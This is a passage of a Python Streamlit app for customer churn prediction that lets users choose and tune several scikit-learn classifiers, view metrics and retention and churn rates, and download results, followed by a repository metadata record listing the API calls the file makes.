\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"Random Forest\":\n params = [\"n_estimators\", \"criterion\", \"max_depth\",\n \"max_features\", \"min_samples_leaf\", \"min_samples_split\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n n_estimators, criterion, max_depth, max_features, min_samples_leaf, min_samples_split = 100, \"gini\", None, None, 1, 2\n for p in range(len(params)):\n if check_param[p] and params[p] == \"n_estimators\":\n n_estimators = st.sidebar.selectbox(\n \"enter n_estimators value\",\n [100, 4, 6, 9]\n )\n if check_param[p] and params[p] == \"criterion\":\n criterion = st.sidebar.selectbox(\n \"enter criterion value\",\n [\"gini\", \"entropy\"]\n )\n if check_param[p] and params[p] == \"max_depth\":\n max_depth = st.sidebar.selectbox(\n \"enter max_depth value\",\n [None, 2, 5, 10, 15]\n )\n if check_param[p] and params[p] == \"max_features\":\n max_features = st.sidebar.selectbox(\n \"enter max_features value\",\n [None, \"auto\", \"sqrt\", \"log2\"]\n )\n if check_param[p] and params[p] == \"min_samples_leaf\":\n min_samples_leaf = st.sidebar.selectbox(\n \"enter min_samples_leaf value\",\n [1, 5, 8, 12]\n )\n if check_param[p] and params[p] == \"min_samples_split\":\n min_samples_split = st.sidebar.selectbox(\n \"enter min_samples_split value\",\n [2, 3, 5, 8]\n )\n if st.sidebar.button(\"Predicting\"):\n rf = RandomForestClassifier(random_state=0, n_estimators=n_estimators, criterion=criterion, max_depth=max_depth,\n max_features=max_features, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, rf, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Different metrics

\n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calculation of your retention and churn rate

\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"KnnClassifier\":\n params = [\"n_neighbors\", \"weights\", \"algorithm\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n n_neighbors, weights, algorithm = 5, \"uniform\", \"auto\"\n for p in range(len(params)):\n if check_param[p] and params[p] == \"n_neighbors\":\n n_neighbors = st.sidebar.selectbox(\n \"enter n_neighbors value\",\n [5, 10, 15, 20, 25]\n )\n if check_param[p] and params[p] == \"weights\":\n weights = st.sidebar.selectbox(\n \"enter weights value\",\n [\"uniform\", \"distance\"]\n )\n if check_param[p] and params[p] == \"algorithm\":\n algorithm = st.sidebar.selectbox(\n \"enter algorithm value\",\n [\"auto\", \"ball_tree\", \"kd_tree\", \"brute\"]\n )\n if st.sidebar.button(\"Predicting\"):\n knn = KNeighborsClassifier(\n n_neighbors=n_neighbors, weights=weights, algorithm=algorithm)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, knn, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Different metrics

\n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calculation of your retention and churn rate

\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"Logistic Regression\":\n params = [\"penalty\", \"solver\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n penalty, solver = \"l2\", \"lbfgs\"\n for p in range(len(params)):\n if check_param[p] and params[p] == \"penalty\":\n penalty = st.sidebar.selectbox(\n \"enter penalty value\",\n [\"l2\", \"l1\", \"elasticnet\", \"none\"]\n )\n if check_param[p] and params[p] == \"solver\":\n solver = st.sidebar.selectbox(\n \"enter solver value\",\n [\"lbfgs\", \"newton-cg\", \"liblinear\", \"sag\", \"saga\"]\n )\n try:\n if penalty == \"l1\" and solver in ['newton-cg', 'sag', 'lbfgs']:\n st.error(\"L1 don't work with \" + solver +\n \". But, it work well with 'liblinear' and 'saga' \")\n if penalty == 'elasticnet' and solver != 'saga':\n st.error(\"elasticnet don't work with \" +\n solver + \". But it work well with saga.\")\n else:\n\n if st.sidebar.button(\"Predicting\"):\n lr = LogisticRegression(\n random_state=0, penalty=penalty, solver=solver)\n if not features:\n st.write(\n \"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, lr, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n

Different metrics

\n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n

Calculation of your retention and churn rate

\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(pd.concat([X_test.drop(\n columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n except:\n st.warning(\"Choose another solver or another penalty\")\n\n if model == \"SVClassification\":\n params = [\"kernel\", \"degree\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n kernel, degree = \"rbf\", 3\n for p in range(len(params)):\n if check_param[p] and params[p] == \"kernel\":\n kernel = st.sidebar.selectbox(\n \"enter kernel value\",\n [\"rbf\", \"poly\", \"sigmoid\", \"precomputed\"]\n )\n if check_param[p] and params[p] == \"degree\":\n degree = st.sidebar.selectbox(\n \"enter degree value\",\n [3, 6, 9]\n )\n if st.sidebar.button(\"Predicting\"):\n sv = SVC(random_state=0, kernel=kernel,\n degree=degree, probability=True)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, sv, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n
Differents metrics
\n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n
Calcul of your retention and churn rate
\n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n\ndef deal_with_NaN(data, choice, col_with_NaN):\n if choice == \"Dropna\":\n data = data.dropna(axis=0)\n st.write(data.isna().sum())\n return data\n\n if choice == \"Replace by Mean\":\n imputer = SimpleImputer(strategy='mean')\n Imputed_data = pd.DataFrame(imputer.fit_transform(data))\n Imputed_data = data.columns\n return Imputed_data\n\n if choice == \"Drop Columns with NaN\":\n return data.drop(columns=col_with_NaN)\n\n\ndef preprocessing(data, target):\n X = data.drop(target, axis=1)\n y = data[target]\n\n return X, y\n\n\ndef evaluation(model, X_train, y_train, X_test, y_test, cv):\n model.fit(X_train, y_train)\n ypred = model.predict(X_test)\n st.write(\"Correlation Matrix\")\n st.write(confusion_matrix(y_test, ypred))\n\n N, train_scores, test_scores = learning_curve(model, X_train, y_train, train_sizes=np.linspace(0.1, 1, 10),\n cv=10)\n\n fig = plt.subplots()\n fig = plt.figure(figsize=(12, 8))\n ax = plt.plot(N, train_scores.mean(axis=1), label='train score')\n ax = plt.plot(N, test_scores.mean(axis=1), label='test score')\n ax = plt.title(\n \"Learning curve for accuracy: This show us if the model overfit\")\n plt.legend()\n st.pyplot(fig)\n\n return model\n\n\ndef main():\n \"\"\"Common Machine Learning EDA\"\"\"\n\n main_content()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "badou11/streamlit_for_churn", "sub_path": "churnapp.py", "file_name": "churnapp.py", "file_ext": "py", "file_size_in_byte": 36529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 66, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.sidebar.error", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 72, "usage_type": "attribute"}, {"api_name": "plotly.express.bar", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 76, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 78, "usage_type": "call"}, {"api_name": "streamlit.sidebar.error", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 80, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 84, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 85, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 89, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 91, "usage_type": "call"}, {"api_name": "plotly.express.box", "line_number": 95, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 95, "usage_type": "name"}, {"api_name": "plotly.express.box", "line_number": 97, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 97, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 100, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 103, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 103, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 110, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 133, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 141, "usage_type": "call"}, {"api_name": "seaborn.distplot", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "streamlit.pyplot", 
"line_number": 146, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 150, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 151, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 152, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 154, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 154, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Pie", "line_number": 155, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 155, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 180, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 181, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 186, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 191, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 194, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 195, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 204, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 204, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 208, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 213, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 217, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 222, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 222, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.file_uploader", "line_number": 228, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 228, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 232, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 232, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.slider", "line_number": 234, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 234, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 238, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 238, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 239, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 239, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 244, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 244, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 247, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 247, "usage_type": "attribute"}, {"api_name": "streamlit.write", "line_number": 248, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 250, "usage_type": "call"}, {"api_name": "streamlit.sidebar", 
"line_number": 250, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 253, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 253, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 256, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 256, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 257, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 257, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.text_input", "line_number": 259, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 259, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.text_input", "line_number": 261, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 261, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 263, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 263, "usage_type": "attribute"}, {"api_name": "streamlit.write", "line_number": 266, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 274, "usage_type": "call"}, {"api_name": "streamlit.sidebar.info", "line_number": 277, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 277, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 281, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 281, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 285, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 285, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.number_input", "line_number": 288, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 288, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 289, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 289, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 293, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 293, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 297, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 297, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 300, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 300, "usage_type": "attribute"}, {"api_name": "streamlit.success", "line_number": 301, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 306, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 306, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 327, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 327, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 339, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 339, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 342, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 342, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 343, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 343, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 348, "usage_type": "call"}, 
{"api_name": "streamlit.write", "line_number": 350, "usage_type": "call"}, {"api_name": "streamlit.sidebar.write", "line_number": 353, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 353, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 356, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 360, "usage_type": "call"}, {"api_name": "streamlit.sidebar.write", "line_number": 362, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 362, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 364, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 364, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 368, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 368, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.slider", "line_number": 372, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 372, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 375, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 375, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 379, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 379, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 391, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 391, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 396, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 396, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 401, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 401, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 406, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 406, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 411, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 411, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 416, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 416, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 420, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 420, "usage_type": "attribute"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 421, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 424, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 426, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 428, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 434, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 438, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 442, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 444, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 452, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 453, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 458, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 458, "usage_type": "attribute"}, {"api_name": 
"pandas.concat", "line_number": 459, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 464, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 464, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 469, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 469, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 474, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 474, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 479, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 479, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 484, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 484, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 489, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 489, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 494, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 494, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 498, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 498, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 499, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 502, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 504, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 506, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 512, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 516, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 521, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 523, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 531, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 532, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 537, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 537, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 538, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 542, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 542, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 547, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 547, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 552, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 552, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 557, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 557, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 561, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 561, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 562, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 565, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 567, "usage_type": "call"}, {"api_name": "streamlit.error", 
